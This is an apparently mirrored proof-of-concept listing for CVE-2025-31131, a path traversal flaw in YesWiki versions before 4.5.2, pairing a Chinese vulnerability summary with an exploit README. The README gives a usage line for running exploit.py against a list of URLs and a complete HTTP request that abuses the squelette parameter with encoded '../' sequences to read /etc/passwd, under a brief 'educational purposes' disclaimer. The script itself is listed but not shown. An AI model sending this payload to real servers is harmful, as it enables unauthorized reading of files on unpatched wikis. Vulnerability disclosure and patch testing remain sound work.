关联漏洞
标题:
YesWiki 路径遍历漏洞
(CVE-2025-31131)
描述:YesWiki是法国YesWiki组织的一个用 PHP 编写的 wiki 系统。用于以协作方式创建和管理网站。 YesWiki 4.5.2之前版本存在路径遍历漏洞,该漏洞源于squelette参数容易受到路径遍历攻击,可能导致读取服务器上的任意文件。
描述
YesWiki is a wiki system written in PHP. The squelette parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.
介绍
---
# CVE-2025-31131 - YesWiki < 4.5.2 Path Traversal Exploit
This is an unauthenticated path traversal exploit targeting YesWiki versions prior to 4.5.2. The vulnerability exists in the `squelette` parameter, which allows reading arbitrary files from the server.
## Vulnerability Details
- CVE-ID: CVE-2025-31131
- Affected Software: YesWiki < 4.5.2
- Type: Path Traversal
- Severity: High (CVSS: 8.6)
- Reference: https://github.com/advisories/GHSA-w34w-fvp3-68xm
## Usage
`python3 exploit.py -l urls.txt`
Here is a second method to exploit manually using Burp:
```
GET /?UrkCEO/edit&theme=margot&squelette=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&style=margot.css HTTP/1.1
Host: target.com
Sec-Ch-Ua: "Chromium";v="133", "Not(A:Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive
```
**Disclaimer**: This is strictly for educational purposes only.
---
文件快照
[4.0K] /data/pocs/0c095cfa85b9c6193a4c853f00e5a7ba6561eda7
├── [3.9K] exploit.py
└── [1.5K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。